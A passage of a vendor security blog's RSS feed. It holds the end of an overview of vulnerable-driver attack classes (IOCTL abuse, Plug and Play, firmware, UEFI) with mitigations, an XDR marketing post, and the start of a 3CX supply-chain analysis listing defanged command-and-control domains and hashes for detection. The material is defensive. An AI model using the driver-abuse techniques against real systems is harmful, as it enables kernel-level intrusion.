<p><strong>Microsoft’s Mitigations</strong><br /> <a href="https://learn.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10">Supervisor Mode Execution Prevention (SMEP)</a> – Prevents the kernel from executing code in user pages.<br /> <a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/vbs-resource-protections">Virtualization-Based Security (VBS)</a> – Restricts access to MSRs and reviews MSR events (successor of <a href="https://windows-internals.com/hyperguard-secure-kernel-patch-guard-part-1-skpg-initialization/">PatchGuard</a>)</p>
<p><strong>Notable Example:</strong> <a href="https://www.microsoft.com/en-us/security/blog/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/">WannaCrypt</a></p>
<h2>Unprotected IOCTL Requests</h2>
<p><a href="https://learn.microsoft.com/en-us/windows/win32/devio/device-input-and-output-control-ioctl-">IOCTL</a> requests are a property and feature of drivers that purposefully allow untrusted or user-mode programs to interact directly with the underlying trusted parts of a driver’s code and subsequently the operating system. For example, when installing a new peripheral device like a video card, there are usually multiple components. One will be a driver for the video card itself and another will be a user interface for tuning how video is processed and displayed. The driver is trusted, and the user interface application is not. Out of necessity, there are predetermined user interactions within the video card user application that can trigger events that run code in the trusted driver. Vulnerabilities occur when the communication between the untrusted and trusted components is taken advantage of by a third party.</p>
<p>Drivers that contain this type of vulnerability share a commonality: accessible IOCTL codes or commands. IOCTL commands are 32-bit values, represented in hex (example: 0x12345678), which can be called from untrusted parts of the operating system to execute code in the trusted part. These commands are <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/defining-i-o-control-codes">defined by the author of the driver</a> and can execute the most protected operating system calls. For example, a video card application can send hardware configuration changes to increase how quickly data is processed. To accomplish this the untrusted user application must be able to communicate with the video card itself. This is possible because the driver contains a predefined <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/creating-ioctl-requests-in-drivers">IOCTL request</a> that the user application can issue to it. The order of events is: the video card application connects to the device driver, sometimes authenticates itself, and sends the command along with any compulsory data (the new settings). Vulnerabilities arise when access to these IOCTL operations is not adequately restricted.</p>
<p>One example of this type of vulnerability is when an unsecured IOCTL request can perform arbitrary memory writes. For example, there are IOCTL requests that result in calls to <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-mmmapiospace">MmMapIoSpace</a>, which maps physical to virtual addresses. Two examples of this are <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15368">CVE-2020-15368</a> and <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-15481">CVE-2020-15481</a>; in both cases unprotected IOCTL commands result in the ability to run untrusted code by writing it directly to arbitrary physical memory.</p>
<p>The scope of <a href="https://cwe.mitre.org/data/definitions/782.html">IOCTL request vulnerabilities</a> is much larger: it goes beyond writing to arbitrary memory and extends to almost any operation available in the operating system. What bad actors can accomplish with this type of vulnerability is completely dependent on what the driver has defined in IOCTLs, and on how security is implemented to prevent unintended use. For this reason, this type of vulnerability is particularly troubling and difficult to defend against, and in an unscientific randomized sampling of vulnerable drivers, it was also the most common.</p>
<p><strong>Microsoft’s Mitigations</strong><br /> <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/security-issues-for-i-o-control-codes">Security Recommendations for I/O Control Codes</a><br /> <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/applying-security-descriptors-on-the-device-object">Applying Security Descriptors on the Device Object</a></p>
<p><strong>Notable Examples</strong><br /> <a href="https://asec.ahnlab.com/wp-content/uploads/2022/10/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Oct-05-2022-3.pdf">Lazarus Group’s Rootkit</a><br /> <a href="https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf">InvisiMole</a><br /> <a href="https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf">Slingshot</a><br /> <a href="https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/">BlackByte</a></p>
<h2>Plug-and-Play Driver Vulnerabilities</h2>
<p>It is great when things “just work,” which is probably why Windows introduced <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/introduction-to-plug-and-play">Plug and Play (PnP)</a> device drivers. This feature of Windows allows the operating system to seamlessly adjust to hardware changes with minimal user interaction. A common example is when a peripheral device like a keyboard is plugged into a computer while Windows is already running. Windows recognizes the new hardware and, in most cases, makes it available for use very quickly. This ease of use can lead to a false sense of security. PnP drivers are still drivers and are susceptible to all the vulnerabilities discussed, and unfortunately more.</p>
<p>The convenience that PnP offers is delivered by <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/pnp-components">additional software layers</a> in both trusted and untrusted parts of the operating system. These allow Windows to recognize hardware changes, allocate memory on behalf of a device, load a driver, and provide some basic components needed by most drivers. To seamlessly install a PnP device, the OS must grant some level of trust to it at some point during the installation, and this is where most PnP vulnerabilities arise and lead to privilege escalation.</p>
<p>From an attacker’s perspective, PnP drivers are beneficial because they can be loaded and unloaded from untrusted user mode with no user interaction. Additionally, you may think this type of vulnerability requires physical access, but this is not the case: <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil">physical access is not required</a>. Generally, vulnerabilities in PnP device drivers provide privilege escalation, which opens the door for other attacks.</p>
<p>Note: PnP drivers should not be confused with <a href="https://learn.microsoft.com/en-us/windows/win32/upnp/overview-of-universal-plug-and-play">UPnP (Universal Plug and Play)</a>, which is a protocol for dynamic network device discovery.</p>
<p><strong>Possible Mitigation</strong><br /> <a href="https://www.bleepingcomputer.com/news/microsoft/how-to-block-windows-plug-and-play-auto-installing-insecure-apps/">DisableCoInstallers Registry Key</a></p>
<p><strong>Notable Examples</strong></p>
<p><a href="https://www.bleepingcomputer.com/news/security/razer-bug-lets-you-become-a-windows-10-admin-by-plugging-in-a-mouse/">PnP Mouse Privilege Escalation</a><br /> <a href="https://windows-internals.com/printdemon-cve-2020-1048/">CVE-2020-1048</a> – Print Spooler<br /> <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675">CVE-2021-1675</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527">CVE-2021-34527</a> – Print Nightmare</p>
<h2>Firmware Update Vulnerabilities</h2>
<p>The introduction provided a definition of a driver and explained the difference between a device driver, which provides hardware-OS communication, and a software driver, which acts more like a filter for the device drivers. There is another type of driver called a <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/system-and-device-firmware-updates-via-a-firmware-driver-package">firmware driver</a>. Like a device driver it is for a single device, but instead of residing in and facilitating communication with the operating system, it provides instructions to be stored on the hardware itself. This includes all the definitions and the logic necessary for the hardware to operate. Firmware drivers are used to load code onto a specialized chip located on the hardware itself. This code is usually placed there by the manufacturer and, for the most part, is not meant to be changed. For this reason, it is good security practice for the firmware to be write-protected; however, sometimes a situation arises where an update is required. This could be a logic error or other oversight that leaves <a href="https://www.bleepingcomputer.com/news/security/hp-fixes-bug-letting-attackers-overwrite-firmware-in-over-200-models/">firmware vulnerable to malicious actors</a>.</p>
<p>Firmware update vulnerabilities do not usually occur in the firmware driver itself but in the lack of access control dictating its use. In a malicious firmware update, the firmware driver replaces the manufacturer-approved code for performing logic on the actual hardware with non-trusted code, and once complete it is close to undetectable. While this type of vulnerability is certainly found on Windows devices, most notably printers, it is far more prevalent on IoT (Internet of Things) devices. IoT devices are non-traditional end-user systems that are connected to the internet, for example cameras, lightbulbs, thermostats, kitchen appliances, and more.</p>
<p><strong>Microsoft Mitigation</strong><br /> <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/firmware-attack-surface-reduction">Firmware Attack Surface Reduction (FASR)</a><br /> <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/updating-device-firmware-using-windows-update">Update device firmware using Windows Update</a></p>
<p><strong>Notable Examples</strong><br /> <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-21134">CVE-2022-21134</a><br /> <a href="https://www.csoonline.com/article/3642988/new-hp-mfp-vulnerabilities-show-why-you-should-update-and-isolate-printers.html">FutureSmart Printer Firmware</a></p>
<h2>UEFI and Boot Loader Vulnerabilities</h2>
<p>UEFI (Unified Extensible Firmware Interface) is the modern version of BIOS (Basic Input/Output System), both of which enable a computer’s hardware to boot the operating system. One benefit of UEFI over BIOS is that it provides the option for secure boot, a security feature that <a href="https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/windows-secure-boot-key-creation-and-management-guidance?view=windows-11">ensures the integrity of code</a> before it executes. UEFI secure boot should only allow code with valid credentials to run, enforcing authenticity through PKI (Public Key Infrastructure) and certificates. For this reason, the UEFI class of driver vulnerability usually involves disabling or bypassing secure boot to run unendorsed code.</p>
<p>UEFI attacks are possible even when the firmware is not left unprotected. VMware Carbon Black’s own Takahiro Haruyama has done extensive research into this type of attack; see his blog post, “<a href="https://blogs.vmware.com/security/2021/06/detecting-uefi-bootkits-in-the-wild-part-1.html">Detecting UEFI Bootkits in the Wild</a>.”</p>
<p><strong>Microsoft Mitigation</strong></p>
<p><a href="https://learn.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process">Secure the Windows boot process</a></p>
<p><strong>Notable Example</strong><br /> From ESET – <a href="https://www.welivesecurity.com/2022/04/19/when-secure-isnt-secure-uefi-vulnerabilities-lenovo-consumer-laptops/">When “secure” isn’t secure at all: High‑impact UEFI vulnerabilities discovered in Lenovo consumer laptops</a></p>
<h2>Conclusion</h2>
<p>This has been an introduction to driver vulnerabilities and is not meant to be all-encompassing of all possible driver vulnerabilities. For example, there are additional MSR manipulation vulnerabilities which could have been covered but were left out. These involve manipulating MSR register values; however, the depth of understanding of MSRs needed to make such a section easily comprehensible went beyond the scope of this brief introduction. Additionally, Microsoft’s virtualization-based security has made MSR attacks far less prevalent.</p>
<p>Network security professionals everywhere spend an untold number of hours working to patch vulnerabilities in their networks as they are discovered. This is a monumental task considering the amount of hardware and software on modern systems. It is no wonder, given all the hours of demanding work devoted to this, that security professionals cringe when an actor brings their own vulnerable driver into a fully patched network. Not to mention that many of these so-called vulnerable drivers are signed; why are they not safe? This overview of driver vulnerabilities has attempted to provide some insight into this question and to provide additional resources to further enrich one’s own knowledge of the topic.</p>
<h2>Protections</h2>
<p>Carbon Black offers multiple out-of-the-box protections against Bring Your Own Vulnerable Driver attacks. The simplest method of protection provided is alerting on or prohibiting known abused drivers in a network. As soon as a vulnerable driver is disclosed, it is added to a known malware list independent of the validity of the file signature. Secondly, a universal requirement of BYOVD attacks is that the vulnerable driver must be installed in the operating system. In the case of BYOVD attacks, the steps required to move the vulnerable driver to the targeted system and then install it are very similar to well-known cyber-attack chains.</p>
<p>One strength of the Carbon Black line of products is the unparalleled ability to identify, alert on, and block cyber-attack chains. Additionally, its endpoint software tracks applications that load data or code into memory, which includes drivers, so any driver loaded into memory will result in an alert or potential block depending on the policy. Finally, Carbon Black products have the capacity to alert on or block the installation of drivers by unknown applications, which stops BYOVD attacks before they progress. All of these individual protections work together to provide a comprehensive defensive strategy that guards against malware even when it uses signed drivers.</p>
<p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html">Bring Your Own Backdoor: How Vulnerable Drivers Let Hackers In</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> </content:encoded> </item> <item> <title>XDR: Identity Matters – Who You Know is As Important as What You Know</title> <link>https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html?utm_source=rss&utm_medium=rss&utm_campaign=xdr-identity-matters-who-you-know-is-as-important-as-what-you-know</link> <dc:creator> <![CDATA[ Justin Falck ]]> </dc:creator> <pubDate>Tue, 18 Apr 2023 15:00:02 +0000</pubDate> <category> <![CDATA[ Endpoint Security ]]>
</category> <guid isPermaLink="false">https://blogs.vmware.com/security/?p=83441</guid> <description> <![CDATA[ <div><img width="300" height="190" src="https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-300x190.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-300x190.png 300w, https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-1024x650.png 1024w, https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-768x488.png 768w, https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-1536x975.png 1536w, https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-2048x1300.png 2048w, https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-600x381.png 600w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>Endpoint security is recognizably an essential part of modern cybersecurity, and endpoint security tools are in many cases a first and last line of defense. Endpoint security is focused on securing servers, workloads, end-user workstations, laptops, and any other devices that are used to access corporate networks and SaaS applications. Generally, endpoint security is regarded … <a href="https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html">Continued</a></p> <p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html">XDR: Identity Matters – Who You Know is As Important as What You Know</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
</description> <content:encoded> <![CDATA[ <div><img width="300" height="190" src="https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-300x190.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-300x190.png 300w, https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-1024x650.png 1024w, https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-768x488.png 768w, https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-1536x975.png 1536w, https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-2048x1300.png 2048w, https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-600x381.png 600w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><span data-contrast="auto">Endpoint security is recognizably an essential part of modern cybersecurity, and endpoint security tools are in many cases a first and last line of defense. Endpoint security is focused on securing servers, workloads, end-user workstations, laptops, and any other devices that are used to access corporate networks and SaaS applications. </span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="auto">Generally, endpoint security is regarded as a mature market and well-understood discipline: defend against malware and non-malware-based attacks (Next Generation Antivirus – NGAV), monitor and manage the baseline security state and vulnerabilities of the endpoint, manage the endpoint host-based firewall (HBFW), and detect and respond to attacks (Endpoint Detection and Response – EDR). 
These are all well understood and, in Carbon Black’s case, all disciplines we excel at and deliver through our platform, VMware Carbon Black Cloud.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="auto">The reality, however, is that threat actors continue to adapt and evolve to evade security tools, and so security tools and processes must also evolve to meet them. </span><b><span data-contrast="auto">This is the driving force behind VMware Carbon Black’s evolution of EDR into extended detection and response (XDR) – ensuring that we continue to empower users and partners to stay ahead of the latest threats.</span></b><span data-contrast="auto"> </span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="auto">Put simply, XDR is the natural evolution of EDR. XDR adds telemetry types, such as identity and network, to the </span><i><span data-contrast="auto">existing</span></i> <i><span data-contrast="auto">process-related</span></i><span data-contrast="auto"> telemetry we have always delivered with EDR. Additional telemetry types increase signal fidelity and provide additional means to detect suspicious activity, reducing the mean time to detect and respond (MTTD/MTTR). With </span><a href="https://www.vmware.com/solutions/xdr-security.html"><span data-contrast="none">VMware Carbon Black XDR</span></a><span data-contrast="auto"> we natively collect and analyze identity, network, and EDR telemetry, all without requiring changes to the network configuration or the installation of additional software or hardware.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="auto">EDR, network, and identity telemetry are all equal pillars of XDR, but for this blog I want to focus on why identity is so important, as the network pillar will be expanded on in a future blog post. 
</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="auto">To stay ahead of the attacker, it is essential to have a clear view of </span><i><span data-contrast="auto">who</span></i><span data-contrast="auto"> is accessing the network, from where, and on which device. This statement addresses the reality that a significant number of attacks involve the creation of new user accounts or identities, account takeover, and privilege escalation, and this is where user authentication visibility comes in. </span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="auto">Carbon Black Cloud is now able to collect events associated with a broad range of identity intelligence or user authentication activity including logon/logoffs, failed logins, account lockouts, privilege assignments, etc. This capability provides critical insights into who is accessing the network, from which device, and from where. We collect this telemetry, index it, and make it searchable in the same Carbon Black Cloud console customers are using today to search process (and network) telemetry. 
The output of the combined telemetry from Carbon Black Cloud is invaluable for detecting and preventing attacks by malicious actors who may use stolen or compromised credentials to gain access to sensitive data or systems.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="auto">There are many benefits of combining user authentication visibility with endpoint security:</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <ul> <li data-leveltext="" data-font="Symbol" data-listid="2" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><b><span data-contrast="auto">Early detection of suspicious activity:</span></b><span data-contrast="auto"> By monitoring user authentication, endpoint security platforms can detect suspicious login attempts or unusual activity on the network. This information can be used to trigger alerts and prompt security teams to investigate potential threats early before they have a chance to cause significant damage.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="2" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><b><span data-contrast="auto">Improved incident response:</span></b><span data-contrast="auto"> User authentication visibility can also provide critical information in the event of a security incident. 
By knowing who was logged in at the time of an incident, security teams can quickly identify potential sources of the problem and take appropriate action to contain and mitigate the impact.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="2" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><b><span data-contrast="auto">Enhanced compliance:</span></b><span data-contrast="auto"> Many compliance regulations require organizations to track and monitor user access to sensitive data and systems. User authentication visibility can help organizations meet these requirements and avoid costly penalties for non-compliance.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="2" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><b><span data-contrast="auto">Improved access control:</span></b><span data-contrast="auto"> User authentication visibility can also help organizations improve access control by identifying users who have excessive or inappropriate access privileges. 
This information can be used to adjust access policies and prevent potential security breaches.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> </ul> <p><span data-contrast="auto">As a security practitioner and as someone who has built security products for over eight years, my top priority is to ensure our customers, partners, and the organizations they defend are protected against modern threats. The inclusion of identity intelligence in Carbon Black Cloud is another way we’re helping empower security professionals to keep their organizations safe. </span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="auto">We will continue to evolve the capability based on feedback from YOU. To learn more, </span><a href="https://www.vmware.com/resources/security/demo.html"><span data-contrast="none">schedule a demo</span></a><span data-contrast="auto">, join the Customer Advisory Board, and if you’re at the <a href="https://engage.vmware.com/rsa2023" target="_blank" rel="noopener">RSA Conference</a> – stop by our booth! </span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="auto">Happy Hunting. </span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p><p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html">XDR: Identity Matters – Who You Know is As Important as What You Know</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> </content:encoded> 
</item> <item> <title>Investigating 3CX Desktop Application Attacks: What You Need to Know</title> <link>https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html?utm_source=rss&utm_medium=rss&utm_campaign=investigating-3cx-desktop-application-attacks-what-you-need-to-know</link> <dc:creator> <![CDATA[ Threat Analysis Unit ]]> </dc:creator> <pubDate>Fri, 31 Mar 2023 16:59:31 +0000</pubDate> <category> <![CDATA[ Threat Analysis Unit ]]> </category> <guid isPermaLink="false">https://blogs.vmware.com/security/?p=83435</guid> <description> <![CDATA[ <div><img width="300" height="162" src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png 300w, https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png 410w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>This is a developing situation and this blog post will be updated as needed. Reports of malicious code associated with the 3CX desktop application – part of the 3CX VoIP (Voice over Internet Protocol) platform – began on March 22, 2023. On March 30, 2023, 3CX confirmed the compromise, noting the affected 3CX desktop app … <a href="https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html">Continued</a></p> <p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html">Investigating 3CX Desktop Application Attacks: What You Need to Know</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> 
</description> <content:encoded> <![CDATA[ <div><img width="300" height="162" src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png 300w, https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png 410w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><i><span data-contrast="auto">This is a developing situation and this blog post will be updated as needed.</span></i><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><span data-contrast="none">Reports of malicious code associated with the 3CX desktop application – part of the 3CX VoIP (Voice over Internet Protocol) platform – began on March 22, 2023. On March 30, 2023, 3CX </span><a href="https://www.3cx.com/blog/news/desktopapp-security-alert/"><span data-contrast="none">confirmed</span></a><span data-contrast="none"> the compromise, noting the affected 3CX desktop app versions were 18.12.407 and 18.12.416 for Windows and 18.11.1213, 18.12.402, 18.12.407 and 18.12.416 for Mac. The NIST National Vulnerability Database has assigned </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-29059"><span data-contrast="none">CVE-2023-29059</span></a><span data-contrast="none"> to track this issue.</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><span data-contrast="none">Reports indicate that one of the bundled libraries included with the 3CX Windows and Mac desktop clients had been altered to contact command and control infrastructure, including a GitHub repository, to deliver second-stage malware. According to 3CX, the malicious domains and the GitHub repository have since been taken down. 
</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><b><span data-contrast="auto">What is the potential impact?</span></b><span data-contrast="auto"> </span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><span data-contrast="auto">Software supply chain attacks, as seen with the SolarWinds attack in December 2020, can lead to security teams discovering that their environment was breached months earlier by what was disguised as a standard software update. This highlights the challenges associated with software validation as part of supply chains. The impact of such an attack can be devastating, causing long-term damage to the business, its reputation, and its customers.</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><span data-contrast="auto">In the case of this 3CXDesktopApp attack, there is not yet enough information on how the compromised code ended up being included in 3CX’s digitally signed installers. 3CX </span><a href="https://www.3cx.com/blog/news/desktopapp-security-alert-updates/"><span data-contrast="none">has hired</span></a><span data-contrast="auto"> Mandiant to assist with forensic activities. 
</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><b><span data-contrast="auto">Observations by VMware Threat Analysis Unit</span></b><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><i><span data-contrast="auto">Note: This is a developing situation and threat analysis will be updated as needed.</span></i><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><span data-contrast="auto">VMware Contexa detected the first connections to the C2 domains included in the ICO files as early as 2023-03-06 (akamaitechcloudservices[.]com) and 2023-03-07 (pbxphonenetwork[.]com, sbmsa[.]wiki, azureonlinestorage[.]com, officeaddons[.]com, pbxsources[.]com, officestoragebox[.]com). See </span><span data-contrast="auto">Figure 1</span><span data-contrast="auto"> for the whole timeline. </span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><span data-ccp-props="{"134245418":true,"201341983":0,"335559739":0,"335559740":240}"><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM.png"><img decoding="async" loading="lazy" class="alignnone size-large wp-image-83437" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-1024x607.png" alt="" width="1024" height="607" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-1024x607.png 1024w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-300x178.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-768x455.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-1536x911.png 1536w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-600x356.png 600w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM.png 
1646w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></span></p> <p><i><span data-contrast="none">Figure </span></i><i><span data-contrast="none">1</span></i><i><span data-contrast="none">: Connections to C2 domains as detected by VMware Contexa.</span></i><span data-ccp-props="{"201341983":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p> <p><span data-contrast="auto">TLS connections to visualstudiofactory[.]com taking place on 2023-03-24 and later were established to a server with a certificate with the following hash ‘cda34a2b46a2269dc5934967175656a81bd3667a21855273dc2c777f8bd2d4c9’, valid from 2022-11-17, expiring on 2023-11-17, and issued by “C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA”. The recorded JA3S is 61be9ce3d068c08ff99a857f62352f9d, although note that it is only useful when looking for TLS connections established by the compromised 3CX desktop app.</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span><span data-contrast="auto">A </span><a href="https://search.censys.io/certificates-legacy?q=parsed.fingerprint_sha256%3A+cda34a2b46a2269dc5934967175656a81bd3667a21855273dc2c777f8bd2d4c9&"><span data-contrast="none">search on Censys</span></a><span data-contrast="auto"> can also reveal that the host had been online since 2022-11-19; our telemetry, however, does not show any activity related to this C2 domain prior to March 2023.</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><span data-contrast="none">Current hashes identified to be banned are the following:</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><span data-contrast="auto">Compromised parents/Installers</span><span 
